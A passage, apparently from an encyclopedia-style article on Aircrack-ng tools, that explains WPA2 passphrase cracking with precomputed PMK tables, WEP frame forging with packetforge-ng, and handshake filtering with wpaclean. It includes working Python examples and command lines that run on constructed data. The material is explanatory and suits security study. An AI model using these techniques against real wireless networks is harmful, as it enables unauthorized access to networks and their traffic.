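def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..., then truncate
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def ptk(pmk_bytes: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_bytes, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 over the EAPOL frame, truncated to 16 bytes
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def with_mic(eapol: bytes, mic: bytes) -> bytes:
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


def eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    # EAPOL-Key message 2 with an all-zero MIC field; key info 0x010a = pairwise | MIC | descriptor v2.
    # The RSN IE in the key data field is constructed (CCMP group/pairwise, PSK AKM).
    key_data = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    desc = struct.pack(">BHHQ32s16s8s8s16sH", 2, 0x010A, 16, replay_counter, snonce,
                       bytes(16), bytes(8), bytes(8), bytes(16), len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(desc)) + desc  # 802.1X version 2, type 3 (Key)


def build_pmk_table(essid: str, wordlist) -> dict:
    # What airolib-ng --batch stores: one PMK per (ESSID, passphrase) pair, the slow step
    return {word: pmk(essid, word) for word in wordlist}


def check_handshake(pmk_table: dict, aa, spa, anonce, snonce, eapol: bytes):
    # What aircrack-ng -r does per candidate: PTK -> KCK -> MIC compare.  No PBKDF2 in this loop.
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = with_mic(eapol, bytes(16))
    for word, k in pmk_table.items():
        kck = ptk(k, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return word
    return None


def constructed_handshake(essid: str, passphrase: str):
    # Simulate a client (SPA) answering an AP (AA) with message 2; addresses and nonces are constructed
    aa, spa = bytes.fromhex("00146c7e4080"), bytes.fromhex("000fb5abcb9d")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    zeroed = eapol_msg2(snonce)
    kck = ptk(pmk(essid, passphrase), aa, spa, anonce, snonce)[:16]
    return aa, spa, anonce, snonce, with_mic(zeroed, eapol_mic(kck, zeroed))


if __name__ == "__main__":
    table = build_pmk_table("linksys", ["password", "12345678", "dictionary", "letmein1"])
    aa, spa, an, sn, eapol = constructed_handshake("linksys", "dictionary")
    print("recovered passphrase:", check_handshake(table, aa, spa, an, sn, eapol))
```

Running the file derives four PMKs (4096 HMAC iterations each) and then finds the passphrase with four cheap MIC checks. Once the table exists, any number of handshakes on that ESSID are checked at the fast rate, which is the effect the -r option exploits; a different ESSID needs a new table because the ESSID is the PBKDF2 salt.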
packetforge-ng
Packetforge-ng is a utility within the Aircrack-ng suite for forging custom 802.11 packets for use in wireless penetration testing and security assessments. It builds encrypted frames from parameters or from existing captures so that they pass as legitimate traffic when injected. The encryption is done without the WEP key: the tool applies a PRGA keystream (the RC4 pseudo-random generation algorithm output recovered for one IV by aireplay-ng's fragmentation or chopchop attacks) to the plaintext and its ICV, and emits frames with the correct 802.11 header, MAC addresses and protection flags.[44] It generates specific packet types: ARP requests (mode -0 or --arp), UDP packets (-1 or --udp), ICMP packets (-2 or --icmp), null packets (-3 or --null) and custom packets (-9 or --custom) built from a user-supplied payload or a modified input file. For custom packets it can re-encrypt the payload of an existing frame with the keystream while preserving or adjusting the layer 2 and 3 fields. The keystream must be at least as long as the plaintext plus the 4-byte ICV, so the roughly 1500-byte keystream recovered by aireplay-ng's fragmentation attack allows full-size frames, including ones that solicit responses from access points. Its handling of the frame control word, the FromDS/ToDS bits and the WEP fields keeps the forged frames conformant to 802.11.[44] The syntax is packetforge-ng <mode> <options>, where the mode selects the packet type and the options set the MAC addresses (-a BSSID, -h source MAC, -c destination MAC), IP addresses (-k destination IP[:port], -l source IP[:port]), TTL (-t) and files (-r to read a raw or pcap packet, -y to read the PRGA file, -w to write the pcap output).
The -e option disables WEP encryption, and -p sets the frame control word in hexadecimal for fine-tuned header manipulation. For example, to forge an ARP request: packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request.cap, which sets the AP and source MACs and the destination and source IPs, applies the keystream from the .xor file and writes a pcap file. For a custom packet from an input capture: packetforge-ng -9 -r input.cap -y keystream.xor -w output.cap. Short null data frames of a chosen size can be built with -3 and -s, for example packetforge-ng -3 -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor, where BSSID and SMAC stand for the real addresses.[44]
In attack use, packetforge-ng crafts frames that provoke replies from target devices, producing fresh initialization vectors (IVs) for WEP key recovery or traffic for further analysis. Forged ARP requests elicit ARP replies from clients or access points, so injecting them repeatedly with aireplay-ng accelerates IV collection on WEP networks; modified captures can likewise be replayed to test network defences. Because WEP has no replay protection, a frame encrypted under a recovered keystream and its original IV is accepted like any other. The resulting pcap files can be injected with aireplay-ng over a monitor-mode interface, and inspected beforehand with tcpdump or a similar tool to check their structure. packetforge-ng is built for WEP-protected networks and needs a valid PRGA file for encryption; the FromDS bit is set and the ToDS bit cleared only when requested, with -j and -o respectively.[44]
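The following Python example (added here; it is not packetforge-ng's code) shows the operation behind packetforge-ng -0: build the LLC/SNAP plus ARP request plaintext, append the CRC-32 ICV, XOR with a recovered keystream, and prepend the 802.11 header and the IV under which that keystream was recovered. The keystream, IV and addresses are constructed in the code; in a real run the IV and keystream are read from the .xor file written by aireplay-ng. A decrypt function verifies the ICV the way a receiver would, which is what makes the forged frame indistinguishable from one encrypted with the real key.

```python
"""Added example (not packetforge-ng code): forging a WEP-protected 802.11 ARP
request from a recovered PRGA keystream, which is what packetforge-ng -0 does.
Keystream, IV and addresses are constructed; in practice they come from the
aireplay-ng fragmentation or chopchop .xor file."""
import struct
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header, ethertype 0x0806


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def ipv4(s: str) -> bytes:
    return bytes(int(o) for o in s.split("."))


def build_arp_request(smac: bytes, sip: bytes, dip: bytes) -> bytes:
    # LLC/SNAP (8 bytes) + Ethernet/IPv4 ARP request (28 bytes) = 36-byte plaintext
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1, smac, sip, bytes(6), dip)
    return LLC_SNAP_ARP + arp


def wep_encrypt(plaintext: bytes, keystream: bytes) -> bytes:
    # WEP: ICV = CRC-32(plaintext); ciphertext = (plaintext || ICV) XOR RC4 keystream.
    # With a recovered keystream no key is needed, but it must cover plaintext + 4 ICV bytes.
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    data = plaintext + icv
    if len(keystream) < len(data):
        raise ValueError(f"keystream is {len(keystream)} bytes, need {len(data)}")
    return bytes(p ^ k for p, k in zip(data, keystream))


def forge_wep_data_frame(bssid: bytes, smac: bytes, dmac: bytes, iv: bytes,
                         key_index: int, keystream: bytes, plaintext: bytes) -> bytes:
    # 802.11 data frame, ToDS=1, Protected=1 (frame control bytes 0x08 0x41):
    # addr1 = BSSID (receiver), addr2 = SMAC (transmitter), addr3 = DMAC (final destination).
    hdr = struct.pack("<BBH6s6s6sH", 0x08, 0x41, 0, bssid, smac, dmac, 0)
    # 3-byte IV + key-index byte.  The IV must be the one the keystream was recovered for;
    # WEP performs no IV replay check, so reusing it is accepted by the receiver.
    wep_hdr = iv + bytes([(key_index & 3) << 6])
    return hdr + wep_hdr + wep_encrypt(plaintext, keystream)


def frame_iv(frame: bytes) -> bytes:
    return frame[24:27]


def wep_decrypt(frame: bytes, keystream: bytes):
    # What the receiver does: XOR with the keystream and verify the ICV.
    # Returns the plaintext, or None when the ICV does not match (wrong keystream/IV or corruption).
    body = frame[28:]  # skip 24-byte 802.11 header + 4-byte IV/key-index
    data = bytes(c ^ k for c, k in zip(body, keystream))
    plaintext, icv = data[:-4], data[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        return None
    return plaintext


if __name__ == "__main__":
    # Constructed stand-in for the .xor file: a 1500-byte keystream and its IV
    keystream = bytes((i * 73 + 17) & 0xFF for i in range(1500))
    iv = b"\x01\x02\x03"
    bssid, smac = mac("00:14:6C:7E:40:80"), mac("00:0F:B5:AB:CB:9D")
    pt = build_arp_request(smac, ipv4("192.168.1.1"), ipv4("192.168.1.100"))
    frame = forge_wep_data_frame(bssid, smac, b"\xff" * 6, iv, 0, keystream, pt)
    print(len(frame), "byte frame; receiver recovers plaintext:", wep_decrypt(frame, keystream) == pt)
```

The example writes no file; to hand the frame to aireplay-ng it would be wrapped in a pcap record, which is what the -w option of packetforge-ng produces. The ICV-only integrity check is also why a recovered keystream suffices: nothing in the frame depends on the key beyond the RC4 output for that IV.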
wpaclean
wpaclean is a utility within the Aircrack-ng suite that filters wireless capture files down to the frames needed for WPA/WPA2 handshake cracking. It reads one or more .cap files and keeps only the EAPOL 4-way handshake frames and the access point's beacon frames (which supply the network name), discarding data frames, unrelated management frames, duplicates and other noise, and writes the result to a single, much smaller output file suitable for aircrack-ng.[45][46] The syntax is wpaclean <output.cap> <input1.cap> [input2.cap ...]; the inputs are typically captures written by airodump-ng, and several inputs are merged into one output. wpaclean identifies complete or partial handshakes from the EAPOL-Key exchange between client and access point and pairs them with the matching beacon. On large captures from long monitoring sessions this removes nearly all of the traffic, which matters on resource-constrained systems.[45][46][47] Because the output keeps only what aircrack-ng needs, other tools may lose information they rely on: hashcat's documentation advises against running wpaclean on captures intended for its converters. Keep the unfiltered capture alongside the cleaned one.
By reducing the capture to the handshake frames, wpaclean speeds up dictionary attacks on WPA2 pre-shared keys in aircrack-ng, which no longer has to parse unrelated traffic, and lets the tester confirm that the required EAPOL messages are present before cracking starts. In practice, after a deauthentication attack has produced candidate handshakes, running wpaclean on the resulting files yields a compact input ready for key recovery.[46][47]
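The following Python example (added here; it is not wpaclean's code) performs a wpaclean-style pass over a libpcap file of raw 802.11 frames: it keeps beacons and unencrypted EAPOL-Key frames, drops everything else, and records which of the four handshake messages were seen per BSSID using the Key Information bits (Ack, MIC, Install). The input capture, including the noise frames, the BSSID 00:14:6c:7e:40:80 and the SSID "teddy", is constructed in memory. Telling message 2 from message 4 by the presence of key data is a heuristic and is marked as such in the code.

```python
"""Added example (not wpaclean's code): a minimal wpaclean-style filter over a
libpcap file of raw 802.11 frames (link type 105).  Keeps beacons and
unencrypted EAPOL-Key frames, drops everything else, and reports which 4-way
handshake messages (1-4) were seen per BSSID.  The capture is constructed below."""
import struct

ETHERTYPE_EAPOL = 0x888E
LLC_SNAP = bytes.fromhex("aaaa03000000")
PCAP_MAGIC, LINKTYPE_IEEE802_11 = 0xA1B2C3D4, 105


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def pcap_header() -> bytes:
    return struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)


def pcap_record(ts: int, frame: bytes) -> bytes:
    return struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame


def iter_pcap(data: bytes):
    # Yield (timestamp, frame) for each record after the 24-byte global header.
    off = 24
    while off + 16 <= len(data):
        ts, _usec, incl, _orig = struct.unpack_from("<IIII", data, off)
        off += 16
        yield ts, data[off:off + incl]
        off += incl


def dot11_header(fc0: int, fc1: int, a1: bytes, a2: bytes, a3: bytes) -> bytes:
    return struct.pack("<BBH6s6s6sH", fc0, fc1, 0, a1, a2, a3, 0)


def beacon(bssid: bytes, ssid: str) -> bytes:
    # Management frame, subtype 8: timestamp, interval, capabilities, then an SSID element.
    body = struct.pack("<QHH", 0, 100, 0x0411) + bytes([0, len(ssid)]) + ssid.encode()
    return dot11_header(0x80, 0x00, b"\xff" * 6, bssid, bssid) + body


def eapol_key(from_ap: bool, bssid: bytes, sta: bytes, key_info: int, key_data: bytes = b"") -> bytes:
    # Unencrypted data frame carrying 802.1X (version 2, type 3 = Key) and an RSN key descriptor.
    # Nonce, IV and MIC are zeroed (constructed) because only the Key Information bits matter here.
    desc = struct.pack(">BHHQ32s16s8s8s16sH", 2, key_info, 16, 1, bytes(32), bytes(16),
                       bytes(8), bytes(8), bytes(16), len(key_data)) + key_data
    body = LLC_SNAP + struct.pack(">HBBH", ETHERTYPE_EAPOL, 2, 3, len(desc)) + desc
    if from_ap:  # FromDS: addr1 = STA, addr2 = BSSID
        return dot11_header(0x08, 0x02, sta, bssid, bssid) + body
    return dot11_header(0x08, 0x01, bssid, sta, bssid) + body  # ToDS: addr1 = BSSID, addr2 = STA


def classify(frame: bytes):
    """Return (kind, bssid, msg): kind is 'beacon', 'eapol' or None; msg is 1-4 or None."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    if ftype == 0 and subtype == 8:
        return "beacon", frame[16:22], None  # addr3 of a beacon is the BSSID
    if ftype != 2 or fc1 & 0x40:  # not a data frame, or Protected: EAPOL handshake frames are sent in clear
        return None, None, None
    hlen = 24 + (2 if subtype & 8 else 0) + (6 if (fc1 & 3) == 3 else 0)  # QoS control / 4-address
    if frame[hlen:hlen + 6] != LLC_SNAP or frame[hlen + 6:hlen + 8] != b"\x88\x8e":
        return None, None, None
    bssid = frame[4:10] if fc1 & 1 else frame[10:16]  # ToDS -> addr1, otherwise addr2
    eapol = frame[hlen + 8:]
    if len(eapol) < 99 or eapol[1] != 3:  # too short for a key descriptor, or not EAPOL-Key
        return None, None, None
    key_info = struct.unpack_from(">H", eapol, 5)[0]
    key_data_len = struct.unpack_from(">H", eapol, 97)[0]
    ack, mic, install = key_info & 0x0080, key_info & 0x0100, key_info & 0x0040
    if ack and not mic:
        msg = 1
    elif ack and mic and install:
        msg = 3
    elif mic and not ack:
        msg = 2 if key_data_len else 4  # heuristic: message 2 carries the RSN IE, message 4 carries no key data
    else:
        msg = None
    return "eapol", bssid, msg


def clean(pcap_bytes: bytes):
    """wpaclean-style pass: returns (cleaned pcap bytes, {bssid: set of handshake message numbers seen})."""
    kept, seen = [pcap_header()], {}
    for ts, frame in iter_pcap(pcap_bytes):
        kind, bssid, msg = classify(frame)
        if kind is None:
            continue
        kept.append(pcap_record(ts, frame))
        if kind == "eapol" and msg:
            seen.setdefault(bssid, set()).add(msg)
    return b"".join(kept), seen


def sample_capture() -> bytes:
    # Constructed capture: one AP, one client, a full handshake, plus encrypted data and a probe request.
    ap, sta, other = mac("00:14:6c:7e:40:80"), mac("00:0f:b5:ab:cb:9d"), mac("00:11:22:33:44:55")
    encrypted_data = dot11_header(0x08, 0x41, ap, sta, other) + bytes(60)  # ToDS, Protected
    probe_req = dot11_header(0x40, 0x00, b"\xff" * 6, sta, b"\xff" * 6) + b"\x00\x00"
    frames = [beacon(ap, "teddy"), encrypted_data, probe_req,
              eapol_key(True, ap, sta, 0x008A),                                   # M1: pairwise | ack
              eapol_key(False, ap, sta, 0x010A, bytes.fromhex("3014") + bytes(20)),  # M2: mic, with RSN IE
              encrypted_data,
              eapol_key(True, ap, sta, 0x13CA, bytes(24)),                        # M3: install | ack | mic | secure
              eapol_key(False, ap, sta, 0x030A)]                                  # M4: mic | secure, no key data
    return pcap_header() + b"".join(pcap_record(1700000000 + i, f) for i, f in enumerate(frames))


if __name__ == "__main__":
    cleaned, seen = clean(sample_capture())
    for bssid, msgs in seen.items():
        print(bssid.hex(":"), "handshake messages seen:", sorted(msgs))
```

The summary it returns is the check a tester wants before cracking: aircrack-ng needs message 2 together with message 1 or 3 (the client's nonce and MIC, and the AP's nonce), so a BSSID that shows only {1} or only {3} has no usable handshake yet. Frames with the Protected bit set are dropped without inspection because EAPOL handshake frames are never encrypted.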